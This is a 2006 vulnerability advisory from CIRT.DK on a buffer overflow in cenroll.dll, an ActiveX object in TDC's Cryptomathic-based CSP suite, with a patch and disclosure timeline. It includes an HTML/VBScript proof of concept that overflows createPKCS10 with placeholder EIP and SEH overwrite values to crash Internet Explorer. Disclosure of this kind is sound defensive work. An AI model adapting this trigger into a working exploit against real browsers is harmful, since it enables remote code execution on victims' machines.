The information has been provided by CIRT.DK.
The original article can be found at: http://www.cirt.dk/advisories/cirt-43-advisory.pdf
A vulnerability has been found in an ActiveX object distributed as part of TDC's Microsoft CSP suite.
The suite consists of Cryptomathic PrimeInk CSP and some ActiveX objects. The primary task of the CSP is to handle private RSA keys that are encrypted by keys derived from the user provided passwords. The ActiveX objects assist in key management operations like certificate request generation, installation of issued certificate, key and certificate backup/recovery and change of password.
While Cryptomathic PrimeInk CSP is used by many institutions around the world, the ActiveX objects have only been distributed as part of TDC's Microsoft CSP suite in Denmark.
The problem is an unhanded field in cenroll.dll, allowing full control of the Instruction Pointer(EIP) on the stack and the SEH allowing several ways to do code execution.
The vulnerability allows code execution on any client machine that has the component installed if the user navigates to an attacker-created website. The attacker creates a website that calls the installed ActiveX component, or it would be possible to make an email with an embedded HTML page thereby triggering an overflow.
Proof of Concept:
The Proof-of-Concept applied here only shows that the vulnerability are present. A PoC have been developed proving that code execution is truly possible.
The PoC developed, exploits the implementation used by TDC Digital signature.
< title>CIRT.DK - Cryptomathic ActiveX Buffer Overflow< / title>
< IMG SRC="http://www.cirt.dk/images/logo.jpg">
< / head>
< h1>TDC Digital Signature ActiveX Buffer Overflow< / h1>
< h4> (c)2006 by Dennis Rand - CIRT.DK< / h4>
The following Proof-of-Concept will make Internet Explorer shutdown, if you are vulnerable.<br>
< / center>
< br >
< script>alert('Press "OK" to see if you are vulnerable')< / script>
< object classid='clsid:6DA9275C-64E5-42A1-879C-D90B5F0DC5B4' id='target' >< / object>
< script language='vbscript'>
arg1 = String(8, "A")
arg1 = arg1 + "ABCD" ' EIP is overwritten here
arg1 = arg1 + String(64, "B")
arg1 = arg1 + "AABB" ' Pointer to the next SEH Handler
arg1 = arg1 + "BBAA" ' SE Handler
arg1 = arg1 + String(700, "C")
arg2 = "DefaultV"
target.createPKCS10 arg1 ,arg2
< / script>
< script>alert('You are secure')< / script>
< / body>
< / html>
18-03-2006 Vulnerability discovered
28-03-2006 Vulnerability reported to Morten Storm TDC Certificates An email sent through csirt at csirt.dk
29-03-2006 TDC responds having received the report
30-03-2006 Received CERT/CC vulnerability tag / CVE tag
30-03-2006 Vulnerability reported to Cryptomathic Morten.Landrock at cryptomathic.com and Torben.Pedersen at cryptomathic.com
30-03-2006 Cryptomathic A/S verifies that they received the report.
25-04-2006 Cryptomathic A/S provides final fix to TDC
01-05-2006 Cryptomathic A/S and TDC approves the final advisory
05-05-2006 TDC releases news to the press, and start rolling out a patch.
05-05-2006 Public release